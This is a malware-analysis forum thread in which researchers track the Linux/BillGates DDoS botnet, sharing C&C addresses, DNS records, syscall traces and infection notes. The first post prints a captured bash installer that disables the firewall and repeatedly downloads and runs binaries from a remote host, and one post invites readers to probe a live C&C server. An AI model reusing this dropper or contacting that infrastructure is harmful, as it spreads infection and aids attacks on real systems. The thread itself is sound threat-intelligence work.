A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24927  by unixfreaxjp
 Tue Jan 13, 2015 11:56 am
Usual one, VT: https://www.virustotal.com/en/file/1808 ... 421148489/
Image
With the "active" effort infection using this script installer (noted the semi-automation trail):
Code: Select all
#!/bin/bash
#00000000000
#000000000000
#0000000000
#========================================================================
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/mmm*
while true

do
    ps aux | grep mmm | grep -v grep 
    if [ $? -eq 0 ];then
         sleep 10
    else
		ls -l /tmp/mmm
			if [ $? -eq 0 ];then
			 /tmp/mmm
			else
    cd /tmp/;wget http://IP:PORT/mmm ; chmod a+x mmm;/tmp/mmm
	fi
   fi
    ps aux | grep fk.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 10
    else
	ls -l /tmp/fk.sh
	if [ $? -eq 0];then
	 /tmp/fk.sh
	else
cd /tmp;wget http://IP:PORT/fk.sh ; chmod a+x fk.sh;/tmp/fk.sh
        fi
   fi
done
It's a domain basis as CNC to knock-down:
Code: Select all
ma.wudikkk.com. 600 IN A 120.27.28.199
wudikkk.com. 3600 IN NS dns10.hichina.com.
wudikkk.com. 3600 IN NS dns9.hichina.com 
syscall PoC:
Code: Select all
sendto(5, "\333\373\1\0\0\1\0\0\0\0\0\0\2ma\7wudikkk\3com\0\0\1\0\1", 32, 0, 
{sa_family=AF_INET, sin_port=htons(53),sin_addr=inet_addr("202.238.95.24")}, 16);
CNC IP/port is up and live, feel free to play :-)
Code: Select all
120.27.28.199:1991 
Located at: 120.27.28.199||37963 | 120.27.0.0/17 | CNNIC-ALIBABA-CN-NET | CN | ALIYUN.COM | ALIYUN COMPUTING CO. LTD
Sample spotted+contributed by malmouse - #MalwareMustDie!
You do not have the required permissions to view the files attached to this post.
 #24948  by kekieres
 Wed Jan 14, 2015 6:36 pm
On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C6C? Just executing in a sandbox and monitoring the traffic? O using strace? both?
You do not have the required permissions to view the files attached to this post.
 #24951  by unixfreaxjp
 Thu Jan 15, 2015 12:51 am
kekieres wrote:On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C6C? Just executing in a sandbox and monitoring the traffic? O using strace? both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.
 #24954  by kekieres
 Thu Jan 15, 2015 9:04 am
unixfreaxjp wrote:
kekieres wrote:On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C6C? Just executing in a sandbox and monitoring the traffic? O using strace? both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.
I truly understand you.
Well, I did it my way and I can say that the sample connects with 218.90.200.250 on port tcp/250000
As far as I've seen and understood, it's just reporting to the C&C.

Just after that contact, it's constantly trying to resolve hostname fk.appledoesnt.com that at the moment does not exist.

In case someone wants the pcap just contact me.

just my last question. I suppose that people have noticed with a simple strings that within all samples there is a big list of IP address. In my sample they are all located in Asia. Anyone has a clue of what they are?
 #24978  by unixfreaxjp
 Sat Jan 17, 2015 4:58 pm
BillGates ddoser with speedy infection, suspected a shellshock driven.
Image
VT: https://www.virustotal.com/en/file/7a91 ... 421512473/
CNC is in USA:
Code: Select all
Sun Jan 18 01:45:24 JST 2015
Connection to 23.228.102.133 25001 port succeeded!
TCP MMD.Kicks.PRC.Moronz:xxxx->23.228.102.133:25001 (ESTABLISHED)
at ASN: 46573 | 23.228.102.0/24 | GLOBAL-FRAG-SERVERS | USA | ARIEL MICHAELI
#MalwareMustDie!
You do not have the required permissions to view the files attached to this post.
 #25282  by malwarelabs
 Thu Feb 19, 2015 10:08 am
130 BillGates samples attached
pwd: infected
You do not have the required permissions to view the files attached to this post.
 #26219  by unixfreaxjp
 Wed Jul 01, 2015 10:59 am
Linux/BillGates was used by the ChinaZ actor as payload, together with Linux/.Iptables|x.
Report http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT: https://www.virustotal.com/en/file/067f ... /analysis/
Image
Code: Select all
CNC Info:
Hostname: udp.f1122.org
IP: 61.160.213.18
Port: 25001

61.160.213.18| - |23650 | 61.160.213.0/24 | CHINANET-JS-AS | CN | chinatelecom.com.cn
ChinaNet Jiangsu Province Network
{
"ip": "61.160.213.18",
"hostname": "udp.f1122.org",
"city": "Nanjing",
"region": "Jiangsu",
"country": "CN",
"loc": "32.0617,118.7778",
"org": "AS23650 AS Number for CHINANET jiangsu province backbone"
}
You do not have the required permissions to view the files attached to this post.
 #26233  by unixfreaxjp
 Fri Jul 03, 2015 9:48 pm
attacking router with ssh brute:
Image

using hacked PC to attack..obviously..
Image

the panel on that PC and weaponized with two ELF MIPS & x32 malware
Image

CNC: 123.249.45.210:36000
Image

VT:
https://www.virustotal.com/en/file/6c39 ... 435959461/
https://www.virustotal.com/en/file/9857 ... 435959488/

#MalwareMUSTDie!!
You do not have the required permissions to view the files attached to this post.
 #26236  by unixfreaxjp
 Sat Jul 04, 2015 10:45 pm
kekieres wrote:
unixfreaxjp wrote:
kekieres wrote:On 09-09-2015, we have located a sample.
(snipped)
just my last question. I suppose that people have noticed with a simple strings that within all samples there is a big list of IP address. In my sample they are all located in Asia. Anyone has a clue of what they are?
Those IPs are DNS amplyfier IP list used for DNS flood attack. Linux/BillGates malware has this function.

Illustration:
Image
  • 1
  • 4
  • 5
  • 6
  • 7
  • 8